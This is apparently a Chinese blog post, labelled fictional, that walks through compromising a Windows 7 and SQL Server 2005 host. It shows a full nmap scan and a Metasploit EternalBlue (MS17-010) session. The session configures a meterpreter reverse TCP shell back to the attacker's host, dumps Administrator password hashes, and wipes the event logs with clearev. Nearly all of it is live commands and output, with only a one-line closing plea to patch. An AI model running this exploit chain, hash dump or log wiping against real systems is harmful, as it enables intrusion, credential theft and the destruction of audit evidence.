**本故事純屬虛構,如有雷同純屬巧合 **
1. nmap掃一梭
nmap -T4 -F --script ms-sql-info 192.168.1.8 Starting Nmap 7.60 ( https://nmap.org ) at 2018-01-19 16:24 ?D1ú±ê×?ê±?? Nmap scan report for 192.168.1.8 Host is up (0.010s latency). Not shown: 86 closed ports PORT STATE SERVICE 21/tcp open ftp 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds 1433/tcp open ms-sql-s 3389/tcp open ms-wbt-server 8009/tcp open ajp13 8443/tcp open https-alt 49152/tcp open unknown 49153/tcp open unknown 49154/tcp open unknown 49155/tcp open unknown 49156/tcp open unknown 49157/tcp open unknown MAC Address: C8:1F:66:01:82:27 (Dell) Host script results: | ms-sql-info: | 192.168.1.8:1433: | Version: | name: Microsoft SQL Server 2005 RTM | number: 9.00.1399.00 | Product: Microsoft SQL Server 2005 | Service pack level: RTM | Post-SP patches applied: false |_ TCP port: 1433 Nmap done: 1 IP address (1 host up) scanned in 36.05 seconds
2. 21、445、1433、3389、8443可以關注一下
3. 最開始東哥考慮利用ftp和mssql,發現管理員安全意識還是比較高的,密碼全都改了。瀏覽器打開8443,發現了這個......
4. 呵呵......systemadmin的密碼沒有修改.....
5. 百度了一下顏色盟的文檔,有一個configadmin的後臺賬號能夠看到sa的密碼,但是被實施工程師改了,如果能拿到sa密碼,你懂得.....
6. 這時候我的助理小明,提出了一個思路,1.8貌似是win7的系統,爲什麼不試試ms17-010呢?自從ms08-067之後,好久沒有這麼爽的exploit了......
7. 一把梭就是幹
_ _ / \ /\ __ _ __ /_/ __ | |\ / | _____ \ \ ___ _____ | | / \ _ \ \ | | \/| | | ___\ |- -| /\ / __\ | -__/ | || | || | |- -| |_| | | | _|__ | |_ / -\ __\ \ | | | | \__/| | | |_ |/ |____/ \___\/ /\ \\___/ \/ \__| |_\ \___\ =[ metasploit v4.16.31-dev ] + -- --=[ 1726 exploits - 986 auxiliary - 300 post ] + -- --=[ 507 payloads - 40 encoders - 10 nops ] + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ] msf > use exploit/windows/smb/ms17_010_eternalblue msf exploit(windows/smb/ms17_010_eternalblue) > info Name: MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption Module: exploit/windows/smb/ms17_010_eternalblue Platform: Windows Arch: Privileged: Yes License: Metasploit Framework License (BSD) Rank: Average Disclosed: 2017-03-14 Provided by: Sean Dillon <[email protected]> Dylan Davis <[email protected]> Equation Group Shadow Brokers thelightcosine Available targets: Id Name -- ---- 0 Windows 7 and Server 2008 R2 (x64) All Service Packs Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- GroomAllocations 12 yes Initial number of times to groom the kernel pool. GroomDelta 5 yes The amount to increase the groom count by per try. MaxExploitAttempts 3 yes The number of times to retry the exploit. ProcessName spoolsv.exe yes Process to inject payload into. RHOST yes The target address RPORT 445 yes The target port (TCP) SMBDomain . no (Optional) The Windows domain to use for authentication SMBPass no (Optional) The password for the specified username SMBUser no (Optional) The username to authenticate as VerifyArch true yes Check if remote architecture matches exploit Target. VerifyTarget true yes Check if remote OS matches exploit Target. Payload information: Space: 2000 Description: This module is a port of the Equation Group ETERNALBLUE exploit, part of the FuzzBunch toolkit released by Shadow Brokers. There is a buffer overflow memmove operation in Srv!SrvOs2FeaToNt. The size is calculated in Srv!SrvOs2FeaListSizeToNt, with mathematical error where a DWORD is subtracted into a WORD. The kernel pool is groomed so that overflow is well laid-out to overwrite an SMBv1 buffer. Actual RIP hijack is later completed in srvnet!SrvNetWskReceiveComplete. This exploit, like the original may not trigger 100% of the time, and should be run continuously until triggered. It seems like the pool will get hot streaks and need a cool down period before the shells rain in again. The module will attempt to use Anonymous login, by default, to authenticate to perform the exploit. If the user supplies credentials in the SMBUser, SMBPass, and SMBDomain options it will use those instead. On some systems, this module may cause system instability and crashes, such as a BSOD or a reboot. This may be more likely with some payloads. References: Also known as: ETERNALBLUE https://technet.microsoft.com/en-us/library/security/MS17-010 https://cvedetails.com/cve/CVE-2017-0143/ https://cvedetails.com/cve/CVE-2017-0144/ https://cvedetails.com/cve/CVE-2017-0145/ https://cvedetails.com/cve/CVE-2017-0146/ https://cvedetails.com/cve/CVE-2017-0147/ https://cvedetails.com/cve/CVE-2017-0148/ https://github.com/RiskSense-Ops/MS17-010 msf exploit(windows/smb/ms17_010_eternalblue) > set RHOST 192.168.1.8 RHOST => 192.168.1.8 msf exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.1.220 LHOST => 192.168.1.220 msf exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp payload => windows/x64/meterpreter/reverse_tcp msf exploit(windows/smb/ms17_010_eternalblue) > show options Module options (exploit/windows/smb/ms17_010_eternalblue): Name Current Setting Required Description ---- --------------- -------- ----------- GroomAllocations 12 yes Initial number of times to groom the kernel pool. GroomDelta 5 yes The amount to increase the groom count by per try. MaxExploitAttempts 3 yes The number of times to retry the exploit. ProcessName spoolsv.exe yes Process to inject payload into. RHOST 192.168.1.8 yes The target address RPORT 445 yes The target port (TCP) SMBDomain . no (Optional) The Windows domain to use for authentication SMBPass no (Optional) The password for the specified username SMBUser no (Optional) The username to authenticate as VerifyArch true yes Check if remote architecture matches exploit Target. VerifyTarget true yes Check if remote OS matches exploit Target. Payload options (windows/x64/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 192.168.1.220 yes The listen address LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Windows 7 and Server 2008 R2 (x64) All Service Packs msf exploit(windows/smb/ms17_010_eternalblue) > exploit [*] Started reverse TCP handler on 192.168.1.220:4444 [*] 192.168.1.8:445 - Connecting to target for exploitation. [+] 192.168.1.8:445 - Connection established for exploitation. [+] 192.168.1.8:445 - Target OS selected valid for OS indicated by SMB reply [*] 192.168.1.8:445 - CORE raw buffer dump (38 bytes) [*] 192.168.1.8:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61 Windows 7 Ultima [*] 192.168.1.8:445 - 0x00000010 74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 te 7601 Service [*] 192.168.1.8:445 - 0x00000020 50 61 63 6b 20 31 Pack 1 [+] 192.168.1.8:445 - Target arch selected valid for arch indicated by DCE/RPC reply [*] 192.168.1.8:445 - Trying exploit with 12 Groom Allocations. [*] 192.168.1.8:445 - Sending all but last fragment of exploit packet [*] 192.168.1.8:445 - Starting non-paged pool grooming [+] 192.168.1.8:445 - Sending SMBv2 buffers [+] 192.168.1.8:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer. [*] 192.168.1.8:445 - Sending final SMBv2 buffers. [*] 192.168.1.8:445 - Sending last fragment of exploit packet! [*] 192.168.1.8:445 - Receiving response from exploit packet [+] 192.168.1.8:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)! [*] 192.168.1.8:445 - Sending egg to corrupted connection. [*] 192.168.1.8:445 - Triggering free of corrupted buffer. [*] Sending stage (205891 bytes) to 192.168.1.8 [*] Meterpreter session 1 opened (192.168.1.220:4444 -> 192.168.1.8:52121) at 2018-01-22 04:10:43 -0500 [+] 192.168.1.8:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [+] 192.168.1.8:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [+] 192.168.1.8:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= meterpreter > systeminfo [-] Unknown command: systeminfo. meterpreter > sysinfo Computer : OS : Windows 7 (Build 7601, Service Pack 1). Architecture : x64 System Language : zh_CN Domain : WORKGROUP Logged On Users : 0 Meterpreter : x64/windows
8. 獲取一下administrator密碼
meterpreter > run windows/gather/smart_hashdump [*] Running module against **** [*] Hashes will be saved to the database if one is connected. [+] Hashes will be saved in loot in JtR password file format to: [*] /root/.msf4/loot/20180122193744_default_192.168.1.8_windows.hashes_513479.txt [*] Dumping password hashes... [*] Running as SYSTEM extracting hashes from registry [*] Obtaining the boot key... [*] Calculating the hboot key using SYSKEY 94a522260bb0d5****4353b4ea3ced56... [*] Obtaining the user list and keys... [*] Decrypting user keys... [*] Dumping password hints... [+] Administrator:"******" [*] Dumping password hashes... [+] Administrator:500:aad3b435b51****eaad3b435b51404ee:4465c7d119414b7760e8afe797b4b510:::
9. 登錄一下
10. 擦屁股走人
meterpreter > clearev [*] Wiping 25655 records from Application... [*] Wiping 10343 records from System... [*] Wiping 38810 records from Security...
**結論:還是把補丁打上吧**